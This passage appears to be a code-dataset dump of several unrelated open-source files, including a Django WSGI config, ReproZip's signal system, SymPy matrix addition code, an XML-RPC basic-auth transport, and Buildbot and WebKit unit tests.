"BLAS", _fblas, _cblas, "fblas", "cblas",
_blas_alias)
|
harikvpy/crud
|
refs/heads/master
|
crud/wsgi.py
|
1
|
"""
WSGI config for crud project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "crud.settings")
application = get_wsgi_application()
|
ViDA-NYU/reprozip
|
refs/heads/1.0.x
|
reprounzip/reprounzip/signals.py
|
1
|
# Copyright (C) 2014-2017 New York University
# This file is part of ReproZip which is released under the Revised BSD License
# See file LICENSE for full license details.
"""Signal system.
Emitting and subscribing to these signals is the framework for the plugin
infrastructure.
"""
from __future__ import division, print_function, unicode_literals
import traceback
import warnings
from reprounzip.utils import irange, iteritems
class SignalWarning(UserWarning):
"""Warning from the Signal class.
Mainly useful for testing (to turn these to errors), however a 'signal:'
prefix is actually used in the messages because of Python bug 22543
http://bugs.python.org/issue22543
"""
class Signal(object):
"""A signal, with its set of arguments.
This holds the expected parameters that the signal expects, in several
categories:
* `expected_args` are the arguments of the signals that must be set. Trying
to emit the signal without these will show a warning and won't touch the
listeners. Listeners can rely on these being set.
* `new_args` are new arguments that listeners cannot yet rely on but that
emitters should try to pass in. Missing arguments doesn't show a warning
yet but might in the future.
* `old_args` are arguments that you might still pass in but that you should
move away from; they will show a warning stating their deprecation.
Listeners can subscribe to a signal, and may be any callable hashable
object.
"""
REQUIRED, OPTIONAL, DEPRECATED = irange(3)
def __init__(self, expected_args=[], new_args=[], old_args=[]):
self._args = {}
self._args.update((arg, Signal.REQUIRED) for arg in expected_args)
self._args.update((arg, Signal.OPTIONAL) for arg in new_args)
self._args.update((arg, Signal.DEPRECATED) for arg in old_args)
if (len(expected_args) + len(new_args) + len(old_args) !=
len(self._args)):
raise ValueError("Repeated argument names")
self._listeners = set()
def __call__(self, **kwargs):
info = {}
for arg, argtype in iteritems(self._args):
if argtype == Signal.REQUIRED:
try:
info[arg] = kwargs.pop(arg)
except KeyError:
warnings.warn("signal: Missing required argument %s; "
"signal ignored" % arg,
category=SignalWarning,
stacklevel=2)
return
else:
if arg in kwargs:
info[arg] = kwargs.pop(arg)
if argtype == Signal.DEPRECATED:
warnings.warn(
"signal: Argument %s is deprecated" % arg,
category=SignalWarning,
stacklevel=2)
if kwargs:
arg = next(iter(kwargs))
warnings.warn(
"signal: Unexpected argument %s; signal ignored" % arg,
category=SignalWarning,
stacklevel=2)
return
for listener in self._listeners:
try:
listener(**info)
except Exception:
traceback.print_exc()
warnings.warn("signal: Got an exception calling a signal",
category=SignalWarning)
def subscribe(self, func):
"""Adds the given callable to the listeners.
It must be callable and hashable (it will be put in a set).
It will be called with the signals' arguments as keywords. Because new
parameters might be introduced, it should accept these by using::
def my_listener(param1, param2, **kwargs_):
"""
if not callable(func):
raise TypeError("%r object is not callable" % type(func))
self._listeners.add(func)
def unsubscribe(self, func):
"""Removes the given callable from the listeners.
If the listener wasn't subscribed, does nothing.
"""
self._listeners.discard(func)
pre_setup = Signal(['target', 'pack'])
post_setup = Signal(['target'], ['pack'])
pre_destroy = Signal(['target'])
post_destroy = Signal(['target'])
pre_run = Signal(['target'])
post_run = Signal(['target', 'retcode'])
pre_parse_args = Signal(['parser', 'subparsers'])
post_parse_args = Signal(['args'])
application_finishing = Signal(['reason'])
unpacker = None
|
Qusic/ycmd
|
refs/heads/master
|
cpp/ycm/tests/gmock/gtest/scripts/upload_gtest.py
|
1963
|
#!/usr/bin/env python
#
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""upload_gtest.py v0.1.0 -- uploads a Google Test patch for review.
This simple wrapper passes all command line flags and
--cc=googletestframework@googlegroups.com to upload.py.
USAGE: upload_gtest.py [options for upload.py]
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import sys
CC_FLAG = '--cc='
GTEST_GROUP = 'googletestframework@googlegroups.com'
def main():
# Finds the path to upload.py, assuming it is in the same directory
# as this file.
my_dir = os.path.dirname(os.path.abspath(__file__))
upload_py_path = os.path.join(my_dir, 'upload.py')
# Adds Google Test discussion group to the cc line if it's not there
# already.
upload_py_argv = [upload_py_path]
found_cc_flag = False
for arg in sys.argv[1:]:
if arg.startswith(CC_FLAG):
found_cc_flag = True
cc_line = arg[len(CC_FLAG):]
cc_list = [addr for addr in cc_line.split(',') if addr]
if GTEST_GROUP not in cc_list:
cc_list.append(GTEST_GROUP)
upload_py_argv.append(CC_FLAG + ','.join(cc_list))
else:
upload_py_argv.append(arg)
if not found_cc_flag:
upload_py_argv.append(CC_FLAG + GTEST_GROUP)
# Invokes upload.py with the modified command line flags.
os.execv(upload_py_path, upload_py_argv)
if __name__ == '__main__':
main()
|
robin-banks/android_kernel_htc_msm8974
|
refs/heads/cm-12.1
|
tools/perf/python/twatch.py
|
7370
|
#! /usr/bin/python
# -*- python -*-
# -*- coding: utf-8 -*-
# twatch - Experimental use of the perf python interface
# Copyright (C) 2011 Arnaldo Carvalho de Melo <acme@redhat.com>
#
# This application is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 2.
#
# This application is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import perf
def main():
cpus = perf.cpu_map()
threads = perf.thread_map()
evsel = perf.evsel(task = 1, comm = 1, mmap = 0,
wakeup_events = 1, watermark = 1,
sample_id_all = 1,
sample_type = perf.SAMPLE_PERIOD | perf.SAMPLE_TID | perf.SAMPLE_CPU | perf.SAMPLE_TID)
evsel.open(cpus = cpus, threads = threads);
evlist = perf.evlist(cpus, threads)
evlist.add(evsel)
evlist.mmap()
while True:
evlist.poll(timeout = -1)
for cpu in cpus:
event = evlist.read_on_cpu(cpu)
if not event:
continue
print "cpu: %2d, pid: %4d, tid: %4d" % (event.sample_cpu,
event.sample_pid,
event.sample_tid),
print event
if __name__ == '__main__':
main()
|
awagnon/maraschino
|
refs/heads/new
|
lib/rtorrent/lib/xmlrpc/basic_auth.py
|
95
|
#
# Copyright (c) 2013 Dean Gardiner, <gardiner91@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from base64 import encodestring
import string
import xmlrpclib
class BasicAuthTransport(xmlrpclib.Transport):
def __init__(self, username=None, password=None):
xmlrpclib.Transport.__init__(self)
self.username = username
self.password = password
def send_auth(self, h):
if self.username is not None and self.password is not None:
h.putheader('AUTHORIZATION', "Basic %s" % string.replace(
encodestring("%s:%s" % (self.username, self.password)),
"\012", ""
))
def single_request(self, host, handler, request_body, verbose=0):
# issue XML-RPC request
h = self.make_connection(host)
if verbose:
h.set_debuglevel(1)
try:
self.send_request(h, handler, request_body)
self.send_host(h, host)
self.send_user_agent(h)
self.send_auth(h)
self.send_content(h, request_body)
response = h.getresponse(buffering=True)
if response.status == 200:
self.verbose = verbose
return self.parse_response(response)
except xmlrpclib.Fault:
raise
except Exception:
self.close()
raise
#discard any response data and raise exception
if response.getheader("content-length", 0):
response.read()
raise xmlrpclib.ProtocolError(
host + handler,
response.status, response.reason,
response.msg,
)
|
NikNitro/Python-iBeacon-Scan
|
refs/heads/master
|
sympy/matrices/expressions/matadd.py
|
8
|
from __future__ import print_function, division
from sympy.core.compatibility import reduce
from operator import add
from sympy.core import Add, Basic, sympify
from sympy.functions import adjoint
from sympy.matrices.matrices import MatrixBase
from sympy.matrices.expressions.transpose import transpose
from sympy.strategies import (rm_id, unpack, flatten, sort, condition,
exhaust, do_one, glom)
from sympy.matrices.expressions.matexpr import MatrixExpr, ShapeError, ZeroMatrix
from sympy.utilities import default_sort_key, sift
class MatAdd(MatrixExpr):
"""A Sum of Matrix Expressions
MatAdd inherits from and operates like SymPy Add
>>> from sympy import MatAdd, MatrixSymbol
>>> A = MatrixSymbol('A', 5, 5)
>>> B = MatrixSymbol('B', 5, 5)
>>> C = MatrixSymbol('C', 5, 5)
>>> MatAdd(A, B, C)
A + B + C
"""
is_MatAdd = True
def __new__(cls, *args, **kwargs):
args = list(map(sympify, args))
check = kwargs.get('check', True)
obj = Basic.__new__(cls, *args)
if check:
validate(*args)
return obj
@property
def shape(self):
return self.args[0].shape
def _entry(self, i, j):
return Add(*[arg._entry(i, j) for arg in self.args])
def _eval_transpose(self):
return MatAdd(*[transpose(arg) for arg in self.args]).doit()
def _eval_adjoint(self):
return MatAdd(*[adjoint(arg) for arg in self.args]).doit()
def _eval_trace(self):
from .trace import trace
return Add(*[trace(arg) for arg in self.args]).doit()
def doit(self, **kwargs):
deep = kwargs.get('deep', True)
if deep:
args = [arg.doit(**kwargs) for arg in self.args]
else:
args = self.args
return canonicalize(MatAdd(*args))
def validate(*args):
if not all(arg.is_Matrix for arg in args):
raise TypeError("Mix of Matrix and Scalar symbols")
A = args[0]
for B in args[1:]:
if A.shape != B.shape:
raise ShapeError("Matrices %s and %s are not aligned"%(A, B))
factor_of = lambda arg: arg.as_coeff_mmul()[0]
matrix_of = lambda arg: unpack(arg.as_coeff_mmul()[1])
def combine(cnt, mat):
if cnt == 1:
return mat
else:
return cnt * mat
def merge_explicit(matadd):
""" Merge explicit MatrixBase arguments
>>> from sympy import MatrixSymbol, eye, Matrix, MatAdd, pprint
>>> from sympy.matrices.expressions.matadd import merge_explicit
>>> A = MatrixSymbol('A', 2, 2)
>>> B = eye(2)
>>> C = Matrix([[1, 2], [3, 4]])
>>> X = MatAdd(A, B, C)
>>> pprint(X)
[1 0] [1 2]
A + [ ] + [ ]
[0 1] [3 4]
>>> pprint(merge_explicit(X))
[2 2]
A + [ ]
[3 5]
"""
groups = sift(matadd.args, lambda arg: isinstance(arg, MatrixBase))
if len(groups[True]) > 1:
return MatAdd(*(groups[False] + [reduce(add, groups[True])]))
else:
return matadd
rules = (rm_id(lambda x: x == 0 or isinstance(x, ZeroMatrix)),
unpack,
flatten,
glom(matrix_of, factor_of, combine),
merge_explicit,
sort(default_sort_key))
canonicalize = exhaust(condition(lambda x: isinstance(x, MatAdd),
do_one(*rules)))
|
protatremy/buildbot
|
refs/heads/master
|
master/buildbot/test/unit/test_schedulers_timed_Periodic.py
|
4
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import print_function
from twisted.internet import defer
from twisted.internet import task
from twisted.trial import unittest
from buildbot import config
from buildbot.schedulers import timed
from buildbot.test.util import scheduler
class Periodic(scheduler.SchedulerMixin, unittest.TestCase):
OBJECTID = 23
SCHEDULERID = 3
def setUp(self):
self.setUpScheduler()
def makeScheduler(self, firstBuildDuration=0, exp_branch=None, **kwargs):
self.sched = sched = timed.Periodic(**kwargs)
self.attachScheduler(self.sched, self.OBJECTID, self.SCHEDULERID)
# add a Clock to help checking timing issues
self.clock = sched._reactor = task.Clock()
# keep track of builds in self.events
self.events = []
def addBuildsetForSourceStampsWithDefaults(reason, sourcestamps,
waited_for=False, properties=None, builderNames=None,
**kw):
self.assertIn('Periodic scheduler named', reason)
# TODO: check branch
isFirst = (self.events == [])
self.events.append('B@%d' % self.clock.seconds())
if isFirst and firstBuildDuration:
d = defer.Deferred()
self.clock.callLater(firstBuildDuration, d.callback, None)
return d
return defer.succeed(None)
sched.addBuildsetForSourceStampsWithDefaults = addBuildsetForSourceStampsWithDefaults
# handle state locally
self.state = {}
def getState(k, default):
return defer.succeed(self.state.get(k, default))
sched.getState = getState
def setState(k, v):
self.state[k] = v
return defer.succeed(None)
sched.setState = setState
return sched
# tests
def test_constructor_invalid(self):
self.assertRaises(config.ConfigErrors,
lambda: timed.Periodic(name='test', builderNames=['test'],
periodicBuildTimer=-2))
def test_constructor_no_reason(self):
sched = self.makeScheduler(
name='test', builderNames=['test'], periodicBuildTimer=10)
self.assertEqual(
sched.reason, "The Periodic scheduler named 'test' triggered this build")
def test_constructor_reason(self):
sched = self.makeScheduler(
name='test', builderNames=['test'], periodicBuildTimer=10, reason="periodic")
self.assertEqual(sched.reason, "periodic")
def test_iterations_simple(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
sched.activate()
self.clock.advance(0) # let it trigger the first build
while self.clock.seconds() < 30:
self.clock.advance(1)
self.assertEqual(self.events, ['B@0', 'B@13', 'B@26'])
self.assertEqual(self.state.get('last_build'), 26)
d = sched.deactivate()
return d
def test_iterations_simple_branch(self):
sched = self.makeScheduler(exp_branch='newfeature',
name='test', builderNames=['test'],
periodicBuildTimer=13, branch='newfeature')
sched.activate()
self.clock.advance(0) # let it trigger the first build
while self.clock.seconds() < 30:
self.clock.advance(1)
self.assertEqual(self.events, ['B@0', 'B@13', 'B@26'])
self.assertEqual(self.state.get('last_build'), 26)
d = sched.deactivate()
return d
def test_iterations_long(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=10,
firstBuildDuration=15) # takes a while to start a build
sched.activate()
self.clock.advance(0) # let it trigger the first (longer) build
while self.clock.seconds() < 40:
self.clock.advance(1)
self.assertEqual(self.events, ['B@0', 'B@15', 'B@25', 'B@35'])
self.assertEqual(self.state.get('last_build'), 35)
d = sched.deactivate()
return d
def test_iterations_stop_while_starting_build(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13,
firstBuildDuration=6) # takes a while to start a build
sched.activate()
self.clock.advance(0) # let it trigger the first (longer) build
self.clock.advance(3) # get partway into that build
d = sched.deactivate() # begin stopping the service
d.addCallback(
lambda _: self.events.append('STOP@%d' % self.clock.seconds()))
# run the clock out
while self.clock.seconds() < 40:
self.clock.advance(1)
# note that the deactivate completes after the first build completes, and no
# subsequent builds occur
self.assertEqual(self.events, ['B@0', 'STOP@6'])
self.assertEqual(self.state.get('last_build'), 0)
return d
def test_iterations_with_initial_state(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
# so next build should start in 6s
self.state['last_build'] = self.clock.seconds() - 7
sched.activate()
self.clock.advance(0) # let it trigger the first build
while self.clock.seconds() < 30:
self.clock.advance(1)
self.assertEqual(self.events, ['B@6', 'B@19'])
self.assertEqual(self.state.get('last_build'), 19)
d = sched.deactivate()
return d
def test_getNextBuildTime_None(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
# given None, build right away
d = sched.getNextBuildTime(None)
d.addCallback(lambda t: self.assertEqual(t, 0))
return d
def test_getNextBuildTime_given(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
# given a time, add the periodicBuildTimer to it
d = sched.getNextBuildTime(20)
d.addCallback(lambda t: self.assertEqual(t, 33))
return d
@defer.inlineCallbacks
def test_enabled_callback(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
expectedValue = not sched.enabled
yield sched._enabledCallback(None, {'enabled': not sched.enabled})
self.assertEqual(sched.enabled, expectedValue)
expectedValue = not sched.enabled
yield sched._enabledCallback(None, {'enabled': not sched.enabled})
self.assertEqual(sched.enabled, expectedValue)
@defer.inlineCallbacks
def test_disabled_activate(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
yield sched._enabledCallback(None, {'enabled': not sched.enabled})
self.assertEqual(sched.enabled, False)
r = yield sched.activate()
self.assertEqual(r, None)
@defer.inlineCallbacks
def test_disabled_deactivate(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
yield sched._enabledCallback(None, {'enabled': not sched.enabled})
self.assertEqual(sched.enabled, False)
r = yield sched.deactivate()
self.assertEqual(r, None)
@defer.inlineCallbacks
def test_disabled_start_build(self):
sched = self.makeScheduler(name='test', builderNames=['test'],
periodicBuildTimer=13)
yield sched._enabledCallback(None, {'enabled': not sched.enabled})
self.assertEqual(sched.enabled, False)
r = yield sched.startBuild()
self.assertEqual(r, None)
|
dparshin/phantomjs
|
refs/heads/master
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/layout_tests/models/test_expectations_unittest.py
|
118
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest2 as unittest
from webkitpy.common.host_mock import MockHost
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.layout_tests.models.test_configuration import *
from webkitpy.layout_tests.models.test_expectations import *
from webkitpy.layout_tests.models.test_configuration import *
try:
from collections import OrderedDict
except ImportError:
# Needed for Python < 2.7
from webkitpy.thirdparty.ordered_dict import OrderedDict
class Base(unittest.TestCase):
# Note that all of these tests are written assuming the configuration
# being tested is Windows XP, Release build.
def __init__(self, testFunc):
host = MockHost()
self._port = host.port_factory.get('test-win-xp', None)
self._exp = None
unittest.TestCase.__init__(self, testFunc)
def get_test(self, test_name):
# FIXME: Remove this routine and just reference test names directly.
return test_name
def get_basic_tests(self):
return [self.get_test('failures/expected/text.html'),
self.get_test('failures/expected/image_checksum.html'),
self.get_test('failures/expected/crash.html'),
self.get_test('failures/expected/missing_text.html'),
self.get_test('failures/expected/image.html'),
self.get_test('passes/text.html')]
def get_basic_expectations(self):
return """
Bug(test) failures/expected/text.html [ Failure ]
Bug(test) failures/expected/crash.html [ WontFix ]
Bug(test) failures/expected/missing_image.html [ Rebaseline Missing ]
Bug(test) failures/expected/image_checksum.html [ WontFix ]
Bug(test) failures/expected/image.html [ WontFix Mac ]
"""
def parse_exp(self, expectations, overrides=None, is_lint_mode=False):
expectations_dict = OrderedDict()
expectations_dict['expectations'] = expectations
if overrides:
expectations_dict['overrides'] = overrides
self._port.expectations_dict = lambda: expectations_dict
expectations_to_lint = expectations_dict if is_lint_mode else None
self._exp = TestExpectations(self._port, self.get_basic_tests(), expectations_to_lint=expectations_to_lint)
def assert_exp(self, test, result):
self.assertEqual(self._exp.get_expectations(self.get_test(test)),
set([result]))
def assert_bad_expectations(self, expectations, overrides=None):
self.assertRaises(ParseError, self.parse_exp, expectations, is_lint_mode=True, overrides=overrides)
class BasicTests(Base):
def test_basic(self):
self.parse_exp(self.get_basic_expectations())
self.assert_exp('failures/expected/text.html', FAIL)
self.assert_exp('failures/expected/image_checksum.html', PASS)
self.assert_exp('passes/text.html', PASS)
self.assert_exp('failures/expected/image.html', PASS)
class MiscTests(Base):
def test_multiple_results(self):
self.parse_exp('Bug(x) failures/expected/text.html [ Crash Failure ]')
self.assertEqual(self._exp.get_expectations(
self.get_test('failures/expected/text.html')),
set([FAIL, CRASH]))
def test_result_was_expected(self):
# test basics
self.assertEqual(TestExpectations.result_was_expected(PASS, set([PASS]), test_needs_rebaselining=False, test_is_skipped=False), True)
self.assertEqual(TestExpectations.result_was_expected(FAIL, set([PASS]), test_needs_rebaselining=False, test_is_skipped=False), False)
# test handling of SKIPped tests and results
self.assertEqual(TestExpectations.result_was_expected(SKIP, set([CRASH]), test_needs_rebaselining=False, test_is_skipped=True), True)
self.assertEqual(TestExpectations.result_was_expected(SKIP, set([CRASH]), test_needs_rebaselining=False, test_is_skipped=False), False)
# test handling of MISSING results and the REBASELINE modifier
self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=True, test_is_skipped=False), True)
self.assertEqual(TestExpectations.result_was_expected(MISSING, set([PASS]), test_needs_rebaselining=False, test_is_skipped=False), False)
def test_remove_pixel_failures(self):
self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS])), set([PASS]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([IMAGE])), set([PASS]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([FAIL])), set([FAIL]))
self.assertEqual(TestExpectations.remove_pixel_failures(set([PASS, IMAGE, CRASH])), set([PASS, CRASH]))
def test_suffixes_for_expectations(self):
self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL])), set(['txt', 'png', 'wav']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set([IMAGE])), set(['png']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set([FAIL, IMAGE, CRASH])), set(['txt', 'png', 'wav']))
self.assertEqual(TestExpectations.suffixes_for_expectations(set()), set())
def test_category_expectations(self):
# This test checks unknown tests are not present in the
# expectations and that known test part of a test category is
# present in the expectations.
exp_str = 'Bug(x) failures/expected [ WontFix ]'
self.parse_exp(exp_str)
test_name = 'failures/expected/unknown-test.html'
unknown_test = self.get_test(test_name)
self.assertRaises(KeyError, self._exp.get_expectations,
unknown_test)
self.assert_exp('failures/expected/crash.html', PASS)
def test_get_modifiers(self):
self.parse_exp(self.get_basic_expectations())
self.assertEqual(self._exp.get_modifiers(
self.get_test('passes/text.html')), [])
def test_get_expectations_string(self):
self.parse_exp(self.get_basic_expectations())
self.assertEqual(self._exp.get_expectations_string(
self.get_test('failures/expected/text.html')),
'FAIL')
def test_expectation_to_string(self):
# Normal cases are handled by other tests.
self.parse_exp(self.get_basic_expectations())
self.assertRaises(ValueError, self._exp.expectation_to_string,
-1)
def test_get_test_set(self):
# Handle some corner cases for this routine not covered by other tests.
self.parse_exp(self.get_basic_expectations())
s = self._exp.get_test_set(WONTFIX)
self.assertEqual(s,
set([self.get_test('failures/expected/crash.html'),
self.get_test('failures/expected/image_checksum.html')]))
def test_parse_warning(self):
try:
filesystem = self._port.host.filesystem
filesystem.write_text_file(filesystem.join(self._port.layout_tests_dir(), 'disabled-test.html-disabled'), 'content')
self.get_test('disabled-test.html-disabled'),
self.parse_exp("[ FOO ] failures/expected/text.html [ Failure ]\n"
"Bug(rniwa) non-existent-test.html [ Failure ]\n"
"Bug(rniwa) disabled-test.html-disabled [ ImageOnlyFailure ]", is_lint_mode=True)
self.assertFalse(True, "ParseError wasn't raised")
except ParseError, e:
warnings = ("expectations:1 Unrecognized modifier 'foo' failures/expected/text.html\n"
"expectations:2 Path does not exist. non-existent-test.html")
self.assertEqual(str(e), warnings)
def test_parse_warnings_are_logged_if_not_in_lint_mode(self):
oc = OutputCapture()
try:
oc.capture_output()
self.parse_exp('-- this should be a syntax error', is_lint_mode=False)
finally:
_, _, logs = oc.restore_output()
self.assertNotEquals(logs, '')
def test_error_on_different_platform(self):
# parse_exp uses a Windows port. Assert errors on Mac show up in lint mode.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) [ Mac ] failures/expected/text.html [ Failure ]\nBug(test) [ Mac ] failures/expected/text.html [ Failure ]',
is_lint_mode=True)
def test_error_on_different_build_type(self):
# parse_exp uses a Release port. Assert errors on DEBUG show up in lint mode.
self.assertRaises(ParseError, self.parse_exp,
'Bug(test) [ Debug ] failures/expected/text.html [ Failure ]\nBug(test) [ Debug ] failures/expected/text.html [ Failure ]',
is_lint_mode=True)
def test_overrides(self):
self.parse_exp("Bug(exp) failures/expected/text.html [ Failure ]",
"Bug(override) failures/expected/text.html [ ImageOnlyFailure ]")
self.assert_exp('failures/expected/text.html', IMAGE)
def test_overrides__directory(self):
self.parse_exp("Bug(exp) failures/expected/text.html [ Failure ]",
"Bug(override) failures/expected [ Crash ]")
self.assert_exp('failures/expected/text.html', CRASH)
self.assert_exp('failures/expected/image.html', CRASH)
def test_overrides__duplicate(self):
self.assert_bad_expectations("Bug(exp) failures/expected/text.html [ Failure ]",
"Bug(override) failures/expected/text.html [ ImageOnlyFailure ]\n"
"Bug(override) failures/expected/text.html [ Crash ]\n")
def test_pixel_tests_flag(self):
def match(test, result, pixel_tests_enabled):
return self._exp.matches_an_expected_result(
self.get_test(test), result, pixel_tests_enabled)
self.parse_exp(self.get_basic_expectations())
self.assertTrue(match('failures/expected/text.html', FAIL, True))
self.assertTrue(match('failures/expected/text.html', FAIL, False))
self.assertFalse(match('failures/expected/text.html', CRASH, True))
self.assertFalse(match('failures/expected/text.html', CRASH, False))
self.assertTrue(match('failures/expected/image_checksum.html', PASS,
True))
self.assertTrue(match('failures/expected/image_checksum.html', PASS,
False))
self.assertTrue(match('failures/expected/crash.html', PASS, False))
self.assertTrue(match('passes/text.html', PASS, False))
def test_more_specific_override_resets_skip(self):
self.parse_exp("Bug(x) failures/expected [ Skip ]\n"
"Bug(x) failures/expected/text.html [ ImageOnlyFailure ]\n")
self.assert_exp('failures/expected/text.html', IMAGE)
self.assertFalse(self._port._filesystem.join(self._port.layout_tests_dir(),
'failures/expected/text.html') in
self._exp.get_tests_with_result_type(SKIP))
class SkippedTests(Base):
def check(self, expectations, overrides, skips, lint=False):
port = MockHost().port_factory.get('qt')
port._filesystem.write_text_file(port._filesystem.join(port.layout_tests_dir(), 'failures/expected/text.html'), 'foo')
expectations_dict = OrderedDict()
expectations_dict['expectations'] = expectations
if overrides:
expectations_dict['overrides'] = overrides
port.expectations_dict = lambda: expectations_dict
port.skipped_layout_tests = lambda tests: set(skips)
expectations_to_lint = expectations_dict if lint else None
exp = TestExpectations(port, ['failures/expected/text.html'], expectations_to_lint=expectations_to_lint)
# Check that the expectation is for BUG_DUMMY SKIP : ... [ Pass ]
self.assertEqual(exp.get_modifiers('failures/expected/text.html'),
[TestExpectationParser.DUMMY_BUG_MODIFIER, TestExpectationParser.SKIP_MODIFIER, TestExpectationParser.WONTFIX_MODIFIER])
self.assertEqual(exp.get_expectations('failures/expected/text.html'), set([PASS]))
def test_skipped_tests_work(self):
self.check(expectations='', overrides=None, skips=['failures/expected/text.html'])
def test_duplicate_skipped_test_fails_lint(self):
